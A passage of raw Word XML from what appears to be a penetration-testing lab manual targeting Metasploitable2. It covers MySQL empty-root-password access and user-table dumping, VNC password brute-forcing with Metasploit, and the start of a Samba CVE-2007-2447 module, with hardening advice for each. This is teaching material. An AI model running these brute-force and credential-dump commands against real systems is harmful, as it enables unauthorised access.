          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable STARTTLS/transport encryption for SMTP sessions where supported.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate-limit and monitor SMTP connection attempts to detect enumeration or abuse patterns.</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How seemingly minor protocol features (VRFY/EXPN) can leak information valuable to attackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The role of manual protocol interaction (via Telnet) in verifying automated scan findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why mail relay configuration is a recurring finding in external penetration tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId19"/>
          <w:footerReference w:type="default" r:id="rId20"/>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6: MySQL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MySQL Database Server</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TCP/3306</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Weak/empty root credentials — exploited via Nmap NSE scripts and direct client authentication</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Critical — unauthenticated administrative access to the database engine</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MySQL vulnerabilities and exploitation techniques target weaknesses in the database management system that allow attackers to gain unauthorized access, manipulate data, or disrupt operations. On Metasploitable2, the root MySQL account is configured with no password, allowing trivial unauthenticated administrative access to the entire database engine.</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This module does not rely on a Metasploit exploit module; instead it demonstrates direct enumeration and access using Nmap's MySQL-focused NSE (Nmap Scripting Engine) scripts followed by direct connection with the standard MySQL command-line client. This mirrors how many real-world MySQL compromises begin: with simple credential or configuration weaknesses rather than software bugs.</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Run Nmap's MySQL brute-force script against the target to test for weak credentials.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--script=mysql-brute 192.168.228.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Nmap's MySQL empty-password detection script to check specifically for an unset root password.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--script=mysql-empty-password 192.168.228.130</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Attempt to connect to the remote MySQL service as root using the -h (host) flag.</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mysql -u root -h 192.168.228.130 -p</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If a TLS negotiation error occurs, retry the connection while skipping SSL negotiation.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mysql -u root -h 192.168.228.130 -p --skip-ssl</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Once connected, enumerate available databases.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databases;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to the built-in mysql system database, which stores account and privilege information.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mysql;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">List its tables.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tables;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Query the user table to extract account names and (historically, hashed) password data — demonstrating the depth of access an attacker gains from this single misconfiguration.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select * from user;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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nmap --script=mysql-brute &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test for weak/guessable MySQL credentials via NSE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nmap --script=mysql-empty-password &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Specifically test for an empty root password</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mysql -u root -h &lt;ip&gt; -p [--skip-ssl]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Connect to the remote MySQL instance as root</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show databases; / use mysql; / show tables;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Standard MySQL enumeration commands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select * from user;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Dump account/privilege data from the mysql.user table</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Always set a strong, unique password for the MySQL root account immediately after installation; never leave it blank.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict MySQL network access via bind-address configuration and firewall rules so the service is not reachable from untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Create least-privilege application-specific database accounts instead of using root for routine operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable and enforce TLS for database connections, and disable remote root login entirely (bind to localhost or use SSH tunneling for administration).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly audit database accounts and run configuration-assessment scans (such as the Nmap NSE scripts used here) as part of routine security testing.</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How a simple missing-password misconfiguration can lead to full administrative database compromise without any exploit code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical use of Nmap's NSE scripting engine for targeted service auditing beyond basic port scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard MySQL command-line enumeration syntax used during post-compromise data discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId21"/>
          <w:footerReference w:type="default" r:id="rId22"/>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7: VNC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VNC (Virtual Network Computing) Remote Desktop</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TCP/5900</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Weak/default VNC authentication password — exploited via Metasploit vnc_login module</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High — unauthenticated full graphical desktop access</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VNC (Virtual Network Computing) is a remote desktop sharing protocol, with port 5900 conventionally used for the first display. It allows a remote user to view and interact with the graphical desktop environment of a target machine. On Metasploitable2, the VNC service is protected only by a weak, well-known password, allowing an attacker to gain full graphical control of the desktop.</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Because VNC grants graphical, interactive control equivalent to sitting at the physical console, a compromised VNC service is functionally equivalent to full desktop takeover. Metasploit's vnc_login auxiliary module automates testing of candidate passwords against the VNC authentication handshake.</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Scan the target to confirm VNC (port 5900) is open.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192.168.228.130 192.168.228.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-reference for known VNC exploits via Searchsploit.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searchsploit vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Metasploit for VNC-related modules and identify vnc_login (module index 108 in this walkthrough).</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 VNC</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Select the vnc_login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108</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review required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Set the target host.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192.168.228.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the module to brute-force/validate the VNC authentication password.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In a new terminal, connect to the target's graphical desktop directly using a VNC viewer client and the recovered password (the default lab password used in this walkthrough is 'password').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vncviewer 192.168.148.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm full interactive graphical desktop access has been obtained.</w:t>
      </w:r>
    </w:p>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searchsploit vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Search Exploit-DB for known VNC-related exploits</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 VNC / use 108</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate and select the vnc_login auxiliary module in Metasploit</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set rhosts &lt;ip&gt; / exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure the target and run the VNC authentication test</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vncviewer &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Connect to the target's graphical desktop using a VNC client</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Set a strong, unique VNC authentication password; never rely on default or trivially guessable values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Where possible, tunnel VNC traffic over SSH or a VPN rather than exposing it directly, and disable direct network exposure of port 5900.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use VNC implementations that support stronger authentication mechanisms (e.g., TLS-based VNC extensions) rather than the legacy DES-based challenge-response scheme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict VNC access using host-based and network firewalls to a minimal set of trusted management hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable account lockout or connection-rate limiting to blunt brute-force attempts against the VNC authentication handshake.</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Why remote desktop protocols represent a particularly high-impact target, since compromise equals full interactive control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How Metasploit auxiliary modules can validate authentication weaknesses ahead of manual client connection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The importance of tunneling legacy remote-access protocols rather than exposing them directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId23"/>
          <w:footerReference w:type="default" r:id="rId24"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 8: SMB Vulnerability Assessment &amp; Exploitation</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3000"/>
        <w:gridCol w:w="6800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba 3.0.20 (SMB/CIFS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Default Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">TCP/445 and TCP/139</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Known Vulnerability / Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba "username map script" Command Execution (CVE-2007-2447)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical — unauthenticated remote root code execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacking Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Victim Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
